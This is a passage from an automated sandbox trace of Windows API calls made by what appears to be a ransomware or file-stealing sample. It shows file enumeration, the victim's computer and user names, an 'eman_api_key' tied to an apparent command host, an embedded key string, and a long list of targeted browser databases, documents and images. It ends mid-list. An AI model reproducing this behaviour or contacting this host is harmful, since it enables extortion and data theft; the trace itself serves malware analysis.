lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0109.496] FindNextFileW (in: hFindFile=0x2cf918, lpFindFileData=0x19dbe0 | out: lpFindFileData=0x19dbe0) returned 1 [0195.327] VirtualAlloc (lpAddress=0x0, dwSize=0xb0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fdf0000 [0195.339] GetCurrentThreadId () returned 0x360 [0195.340] GetCurrentThreadId () returned 0x360 [0195.340] GetCurrentThreadId () returned 0x360 [0195.340] VirtualFree (lpAddress=0x7fdf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: 2891_1GB", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: 2891_1GB", cchWideChar=16, lpMultiByteStr=0x1fc8a3c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[DONE]: 2891_1GB", lpUsedDefaultChar=0x0) returned 16 [0195.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fba654, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0195.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0195.342] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fba654, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0195.342] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x12, lpOverlapped=0x0) returned 1 [0195.343] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x247de6c, nSize=0x8000 | out: lpDst="LHNIWSJ") returned 0x8 [0195.343] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x247de6c, nSize=0x8000 | out: lpDst="CIiHmnxMn6Ps") returned 0xd [0195.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=12, lpWideCharStr=0x19eb2c, cchWideChar=2047 | out: lpWideCharStr="eman_api_key") returned 12 [0195.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcfb4c, cbMultiByte=26, lpWideCharStr=0x19eb28, cchWideChar=2047 | out: lpWideCharStr="http://eman.mygoodsday.org") returned 26 [0195.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x1fde264 | out: lpThreadId=0x1fde264*=0xf98) returned 0x284 [0195.343] SetThreadPriority (hThread=0x284, nPriority=0) returned 1 [0195.343] ResumeThread (hThread=0x284) returned 0x1 [0195.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=12, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="[FLDUMPFILE]") returned 12 [0195.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fb306c, cbMultiByte=8, lpWideCharStr=0x19eb40, cchWideChar=2047 | out: lpWideCharStr="dmp.fldpUMPFILE]") returned 8 [0195.343] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0195.343] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0195.343] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0195.343] LockResource (hResData=0x525e94) returned 0x525e94 [0195.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5430, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0195.343] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5430, cbMultiByte=38, lpWideCharStr=0x1fde20c, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0195.343] FreeResource (hResData=0x525e94) returned 0 [0195.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0195.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe5434, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0195.344] GetCurrentThreadId () returned 0x360 [0195.344] GetCurrentThreadId () returned 0x360 [0195.344] GetCurrentThreadId () returned 0x360 [0195.344] VirtualAlloc (lpAddress=0x0, dwSize=0xb0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fdf0000 [0195.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\OfflineCache\\index.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5A-3b.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5UC29z.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FEPhIIgzp.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\j1_seNfY9YsSPrO.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\pA4DlvvotSqCLQb.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\2M-Nd j92CbW7ShqCq.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\64ViLky MJ-FbLZtty.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\xg45.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\1otVYv2w1PnUvoA.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\cXulwEpXFuX3h8kmE.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FAlPf1_iqLEidMEN4F.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\5QVKTwqSooul.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\kAZBkdhribwEPz- GM.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\L2 LL5CzSzHg0d.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\qeYwSL.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\DHBFRkC0Y1s_1InoiwZ.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\EM8H.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\vi3pXsOlMjGV.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FiKLlYoo j5ePOAA.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\wqHfuxshMYQlz.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\54Z4PLTGEqndqiz3l.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\gzgG b o3c.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sQcpe7y_e37kKQ 1S.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\B2HRjnj Cy6A-H dgdys.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\QiIJIhuAAuEZBbLqKHJ6.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\4ueyApzjR.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sZ-mvJRFLSQGLSr.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\_t6aWhRfJ2C7a_e5.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\0wJchQcNkFvmoOWLqz.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\FHEJii.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\WVY4HBl.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\n94BTv1wcjugrAM5GRY9.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\3PnXkAK4_WoRrsR.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\cDSWR2OIb8.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\ctKhzFxQrBX.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FkQKXs7m2F.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\95MYVGF5_rM.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\r4_0oc9EnjRh.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\sUjiIGFw8gHqMQ5uJmO.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\t2vg0Qz0z6T.jpg\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z\r\nC:\\Program Files\\desktop.ini\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe\r\nC:\\Program Files\\Java\\", cchWideChar=339053, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 339053 [0195.350] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fd90000 [0195.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\OfflineCache\\index.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5A-3b.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5UC29z.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FEPhIIgzp.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\j1_seNfY9YsSPrO.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\pA4DlvvotSqCLQb.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\2M-Nd j92CbW7ShqCq.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\64ViLky MJ-FbLZtty.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\xg45.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\1otVYv2w1PnUvoA.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\cXulwEpXFuX3h8kmE.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FAlPf1_iqLEidMEN4F.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\5QVKTwqSooul.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\kAZBkdhribwEPz- GM.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\L2 LL5CzSzHg0d.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\qeYwSL.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\DHBFRkC0Y1s_1InoiwZ.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\EM8H.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\vi3pXsOlMjGV.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FiKLlYoo j5ePOAA.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\wqHfuxshMYQlz.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\54Z4PLTGEqndqiz3l.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\gzgG b o3c.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sQcpe7y_e37kKQ 1S.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\B2HRjnj Cy6A-H dgdys.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\QiIJIhuAAuEZBbLqKHJ6.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\4ueyApzjR.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sZ-mvJRFLSQGLSr.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\_t6aWhRfJ2C7a_e5.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\0wJchQcNkFvmoOWLqz.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\FHEJii.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\WVY4HBl.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\n94BTv1wcjugrAM5GRY9.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\3PnXkAK4_WoRrsR.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\cDSWR2OIb8.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\ctKhzFxQrBX.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FkQKXs7m2F.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\95MYVGF5_rM.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\r4_0oc9EnjRh.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\sUjiIGFw8gHqMQ5uJmO.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\t2vg0Qz0z6T.jpg\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z\r\nC:\\Program Files\\desktop.ini\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe\r\nC:\\Program Files\\Java\\", cchWideChar=339053, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 339053 [0195.353] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\OfflineCache\\index.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5A-3b.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5UC29z.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FEPhIIgzp.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\j1_seNfY9YsSPrO.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\pA4DlvvotSqCLQb.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\2M-Nd j92CbW7ShqCq.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\64ViLky MJ-FbLZtty.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\xg45.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\1otVYv2w1PnUvoA.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\cXulwEpXFuX3h8kmE.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FAlPf1_iqLEidMEN4F.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\5QVKTwqSooul.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\kAZBkdhribwEPz- GM.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\L2 LL5CzSzHg0d.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\qeYwSL.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\DHBFRkC0Y1s_1InoiwZ.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\EM8H.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\vi3pXsOlMjGV.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building 